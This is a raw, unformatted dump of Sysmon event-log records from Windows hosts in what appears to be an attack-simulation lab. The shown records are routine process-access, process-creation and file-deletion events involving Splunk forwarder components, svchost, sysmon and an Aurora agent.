12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016314Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016313Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016312Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016311Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016310Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016309Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016308Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016307Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E449-63C7-FC01-00000000B002}848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016306Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E449-63C7-FC01-00000000B002}848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016305Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.132{E5A8D418-E449-63C7-FC01-00000000B002}848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.312{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=A85BEBB41844A38098FF539089E647F0,SHA256=DC25A0F72C1781AD0DCA8405946D0EFE44992133C778F26E9CE7583F0B30EE3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016354Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.967{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7827A45FBAE3E7A96CBD4C156503C7BD,SHA256=9096BFD2BD472A6C858E683B4A66B3B72530403CB962CE618BA7B8F84EA73742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.847{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FC3A9F64B838B1A639793AC1BA9BC81,SHA256=64D50ACC3E32D0E0111435AFE62BDE630CF1255A4A402EC309DB137B7A743F0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.597{FE4C2B44-E44A-63C7-2206-00000000AF02}45045192C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E44A-63C7-2206-00000000AF02}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E44A-63C7-2206-00000000AF02}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E44A-63C7-2206-00000000AF02}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.457{FE4C2B44-E44A-63C7-2206-00000000AF02}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:30.184{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=3229D9F21C624C91E18E0E9A9C86C1FE,SHA256=F647652156EBE40D19F2E7F4490165273BC00AF9F5F3F3180BD94F0A368D6278,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016353Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016352Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016351Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016350Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016349Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016348Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.588{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program 